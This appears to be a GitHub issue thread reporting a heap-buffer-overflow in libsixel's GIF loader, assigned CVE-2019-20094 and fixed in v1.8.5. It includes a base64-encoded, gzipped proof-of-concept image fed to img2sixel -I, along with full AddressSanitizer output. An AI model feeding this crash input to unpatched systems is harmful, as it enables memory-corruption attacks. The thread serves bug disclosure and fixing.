Closed cuanduo closed 4 years ago
I can't reproduce it.
$ Linux vagrant 4.15.0-72-generic #81-Ubuntu SMP Tue Nov 26 12:20:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
$ git checkout v1.8.4 && (CFLAGS="-g -O0 -fno-omit-frame-pointer -fsanitize=address" ./configure && make && sudo make install) 2>&1 > /dev/null && echo H4sIAM5HA14AA3P3dLOwTIzafqjiIjMDENzlZP/9mfX///+KP1l4uRiYGXRAogZAyMD0786OwsfHeqXN88hlBC5y6ZTCJjVFAyQlpJqFIeUFk/K6gialipCasgJFSghZSiMQSaoTTeoRXMoNXWoRXAokwtSi8Q8iB2QFLjoClVsMFGFlYoFogzKQpBiZWDjAUlAGVGoRFqlOQlKBWKWk8EtZYJcSgkuhOx5JCuJTOOMfihxqUEGkNHBImcKkWBFSIsRLMeKUYlJEkuJAkWJQRZYKQEg5NDAg6ZrCIaDgAJaywLALNaT+CbE6weUwgwomxdWCPxQhUjugiuHRAtGOiEygFRJAlzUwMDshSRVCXTYDJMXBDHWrNJLUlA6DxEMtnIooUouhkSEAlIKFSy+qVCDQQCFUqccocfkPzDpCRG7Bk8fw5Ux8+RlfKYCv7MBX4pDGkMYtx8pgDQAZg3/ARQUAAA== | base64 --decode | gunzip | converters/img2sixel && echo ok
HEAD is now at 686d234 Merge branch 'release'
ar: `u' modifier ignored since `D' is the default (see `U')
q"1;1;48;48#0;2;0;0;0#1;2;87;4;3#2;2;98;95;2-------ok
Can you give me more information about your environment?
ok, reproduced with -I
option
$ git checkout v1.8.4 && (CFLAGS="-g -O0 -fno-omit-frame-pointer -fsanitize=address" ./configure && make && sudo make install) 2>&1 > /dev/null && echo H4sIAM5HA14AA3P3dLOwTIzafqjiIjMDENzlZP/9mfX///+KP1l4uRiYGXRAogZAyMD0786OwsfHeqXN88hlBC5y6ZTCJjVFAyQlpJqFIeUFk/K6gialipCasgJFSghZSiMQSaoTTeoRXMoNXWoRXAokwtSi8Q8iB2QFLjoClVsMFGFlYoFogzKQpBiZWDjAUlAGVGoRFqlOQlKBWKWk8EtZYJcSgkuhOx5JCuJTOOMfihxqUEGkNHBImcKkWBFSIsRLMeKUYlJEkuJAkWJQRZYKQEg5NDAg6ZrCIaDgAJaywLALNaT+CbE6weUwgwomxdWCPxQhUjugiuHRAtGOiEygFRJAlzUwMDshSRVCXTYDJMXBDHWrNJLUlA6DxEMtnIooUouhkSEAlIKFSy+qVCDQQCFUqccocfkPzDpCRG7Bk8fw5Ux8+RlfKYCv7MBX4pDGkMYtx8pgDQAZg3/ARQUAAA== | base64 --decode | gunzip | converters/img2sixel -I && echo ok
HEAD is now at 686d234 Merge branch 'release'
ar: `u' modifier ignored since `D' is the default (see `U')
=================================================================
==3386==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f2bf4629e9c at pc 0x7f2c542785f4 bp 0x7ffe807e8570 sp 0x7ffe807e8560
WRITE of size 1 at 0x7f2bf4629e9c thread T0
#0 0x7f2c542785f3 in gif_init_frame /home/vagrant/libsixel/src/fromgif.c:250
#1 0x7f2c5427ad7d in load_gif /home/vagrant/libsixel/src/fromgif.c:644
#2 0x7f2c54274a9c in load_with_builtin /home/vagrant/libsixel/src/loader.c:888
#3 0x7f2c54275426 in sixel_helper_load_image_file /home/vagrant/libsixel/src/loader.c:1392
#4 0x7f2c54284d5d in sixel_encoder_encode /home/vagrant/libsixel/src/encoder.c:1737
#5 0x55cce5eb4232 in main /home/vagrant/libsixel/converters/img2sixel.c:451
#6 0x7f2c53e12b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#7 0x55cce5eb1c59 in _start (/home/vagrant/libsixel/converters/.libs/img2sixel+0x1c59)
0x7f2bf4629e9c is located 0 bytes to the right of 58156700-byte region [0x7f2bf0eb3800,0x7f2bf4629e9c)
allocated by thread T0 here:
#0 0x7f2c545bbb50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50)
#1 0x55cce5eb4523 in rpl_malloc /home/vagrant/libsixel/converters/malloc_stub.c:45
#2 0x7f2c542924b0 in sixel_allocator_malloc /home/vagrant/libsixel/src/allocator.c:155
#3 0x7f2c5427825c in gif_init_frame /home/vagrant/libsixel/src/fromgif.c:239
#4 0x7f2c5427ad7d in load_gif /home/vagrant/libsixel/src/fromgif.c:644
#5 0x7f2c54274a9c in load_with_builtin /home/vagrant/libsixel/src/loader.c:888
#6 0x7f2c54275426 in sixel_helper_load_image_file /home/vagrant/libsixel/src/loader.c:1392
#7 0x7f2c54284d5d in sixel_encoder_encode /home/vagrant/libsixel/src/encoder.c:1737
#8 0x55cce5eb4232 in main /home/vagrant/libsixel/converters/img2sixel.c:451
#9 0x7f2c53e12b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/vagrant/libsixel/src/fromgif.c:250 in gif_init_frame
Shadow bytes around the buggy address:
0x0fe5fe8bd380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe5fe8bd390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe5fe8bd3a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe5fe8bd3b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe5fe8bd3c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe5fe8bd3d0: 00 00 00[04]fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe5fe8bd3e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe5fe8bd3f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe5fe8bd400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe5fe8bd410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe5fe8bd420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3386==ABORTING
This issue has been assinged CVE-2019-20094.
Fixed on v1.8.5. Thanks!
img2sixel -I $POC
smile.zip
asan output